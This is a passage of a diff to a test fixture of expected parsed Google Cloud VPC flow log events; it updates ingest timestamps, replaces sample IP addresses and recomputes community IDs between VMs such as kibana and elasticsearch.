@@ -13747,8 +13747,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868933Z", - "original": "{\"insertId\":\"bxuq05fhgmw8y\",\"jsonPayload\":{\"bytes_sent\":\"1496\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":32882},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391939500Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw8y\",\"jsonPayload\":{\"bytes_sent\":\"1496\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":32882},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:44:07.689331553Z", "end": "2019-06-14T03:44:07.811355936Z", @@ -13769,10 +13769,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60126, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -13786,7 +13786,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:p5hGVmQSWVn7uQmogt/lZdp5AHE=", + "community_id": "1:sulbuX1U/FB5g/v7obH/rY0tcHw=", "bytes": 155675, "name": "default", "transport": "tcp", @@ -13809,7 +13809,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { 
@@ -13845,8 +13845,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868935800Z", - "original": "{\"insertId\":\"bxuq05fhgmw9e\",\"jsonPayload\":{\"bytes_sent\":\"155675\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60126,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"288\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391945Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9e\",\"jsonPayload\":{\"bytes_sent\":\"155675\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60126,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"288\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", "end": "2019-06-14T03:49:52.101129310Z", @@ -13867,9 +13867,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 32882, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -13883,7 +13883,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:JBPQPPGDjRGxMSu2nEFLssfmXHs=", + "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", "bytes": 1791, "transport": "tcp", "type": "ipv4", @@ -13898,7 +13898,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -13922,8 +13922,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868938800Z", - "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391950300Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:44:07.689331553Z", "end": "2019-06-14T03:44:07.811355936Z", @@ -13950,17 +13950,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.212", + "address": "67.43.156.13", "port": 39568, "bytes": 28304484, - "ip": "203.0.113.212", + "ip": "67.43.156.13", "packets": 2400 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:3ECu9H2H+Xk3IO0c7PNGEZBOixg=", + "community_id": "1:D3OepdPO3lrAoChStvPcsoP/HLk=", "bytes": 28304484, "transport": "tcp", "type": "ipv4", @@ -13974,7 +13974,7 @@ }, "related": { "ip": [ - "203.0.113.212", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -13999,8 +13999,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868941600Z", - "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.212\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391955900Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.480787267Z", "end": "2019-06-14T03:49:02.085146013Z", @@ -14021,9 +14021,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.212", + "address": "67.43.156.13", "port": 39568, - "ip": "203.0.113.212" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -14037,7 +14037,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:3ECu9H2H+Xk3IO0c7PNGEZBOixg=", + "community_id": "1:D3OepdPO3lrAoChStvPcsoP/HLk=", "bytes": 2962242, "transport": "tcp", "type": "ipv4", @@ -14052,7 +14052,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.212" + "67.43.156.13" ] }, "gcp": { 
@@ -14076,8 +14076,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868944500Z", - "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"203.0.113.212\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391961400Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.480787267Z", "end": "2019-06-14T03:49:02.085146013Z", @@ -14098,9 +14098,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58026, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -14114,7 +14114,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iqLE2ZKPjY+4CpYdTYZLcB7D1xk=", + "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -14129,7 +14129,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -14153,8 +14153,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868947400Z", - "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391967100Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:49:08.995009558Z", "end": "2019-06-14T03:49:09.114674887Z", @@ -14175,10 +14175,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -14192,7 +14192,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Zm3DkZJD/U+ewVlHMnyoA6QK9Do=", + "community_id": "1:h8J6a5Itbyk70zoisAG0nlUOW1s=", "bytes": 9611, "name": "default", "transport": "tcp", @@ -14215,7 +14215,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -14251,8 +14251,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868950100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9f\",\"jsonPayload\":{\"bytes_sent\":\"9611\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"101\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391971100Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9f\",\"jsonPayload\":{\"bytes_sent\":\"9611\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"101\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", "end": "2019-06-14T03:49:37.933323342Z", @@ -14273,10 +14273,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -14290,7 +14290,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:d+9cs8ZSIwCZUTV/HN9P0arhfqU=", + "community_id": "1:xK6qqvSvQC9vUS1J4R94Va2tqkE=", "bytes": 318481, "name": "default", "transport": "tcp", @@ -14313,7 +14313,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -14346,8 +14346,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868953100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9j\",\"jsonPayload\":{\"bytes_sent\":\"318481\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"181\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391975Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9j\",\"jsonPayload\":{\"bytes_sent\":\"318481\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"181\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", "end": "2019-06-14T03:49:59.597223164Z", @@ -14374,18 +14374,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 139359, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 70 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Zm3DkZJD/U+ewVlHMnyoA6QK9Do=", + "community_id": "1:h8J6a5Itbyk70zoisAG0nlUOW1s=", "bytes": 139359, "name": "default", "transport": "tcp", @@ -14407,7 +14407,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -14444,8 +14444,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868955900Z", - "original": "{\"insertId\":\"bxuq05fhgmw97\",\"jsonPayload\":{\"bytes_sent\":\"139359\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"70\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": 